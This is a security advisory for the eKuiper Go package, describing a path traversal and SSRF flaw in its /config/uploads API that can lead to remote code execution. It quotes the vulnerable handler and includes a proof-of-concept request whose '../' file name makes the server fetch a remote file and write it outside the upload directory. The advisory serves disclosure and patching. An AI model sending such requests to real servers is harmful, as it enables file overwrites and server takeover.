GHSA-gj54-gwj9-x2c6 – github.com/lf-edge/ekuiper

Package

Manager: go
Name: github.com/lf-edge/ekuiper
Vulnerable Version: >=0 <=1.14.7

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N/E:P/RL:U/RC:C

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P

EPSS: N/A pctlN/A

Details

eKuiper /config/uploads API arbitrary file writing may lead to RCE ### Summary eKuiper /config/uploads API supports accessing remote web URLs and saving files in the local upload directory, but there are no security restrictions, resulting in arbitrary file writing through ../. If run with root privileges, RCE can be achieved by writing crontab files or ssh keys. ### Details ```go func fileUploadHandler(w http.ResponseWriter, r *http.Request) { switch r.Method { // Upload or overwrite a file case http.MethodPost: switch r.Header.Get("Content-Type") { case "application/json": fc := &fileContent{} defer r.Body.Close() err := json.NewDecoder(r.Body).Decode(fc) if err != nil { handleError(w, err, "Invalid body: Error decoding file json", logger) return } err = fc.Validate() if err != nil { handleError(w, err, "Invalid body: missing necessary field", logger) return } filePath := filepath.Join(uploadDir, fc.Name) err = upload(fc) ``` - The fc.Name parameter do not safely filtered. ### PoC ``` POST /config/uploads HTTP/1.1 Host: localhost:9081 Content-Type: application/json Content-Length: 89 { "name": "../../../../tmp/success", "file": "http://192.168.65.254:8888/success" } ```  ### Impact Tested and verified only on 1.14.3 and 1.14.1, theoretically all versions using this code could be affected. 1. SSRF 2. Path-Travel 3. May leads to RCE The reporters is m0d9 from Tencent YunDing Lab.

Metadata

Created: 2025-07-03T14:22:05Z
Modified: 2025-07-03T14:22:05Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-gj54-gwj9-x2c6/GHSA-gj54-gwj9-x2c6.json
CWE IDs: ["CWE-434"]
Alternative ID: N/A
Finding: F027
Auto approve: 1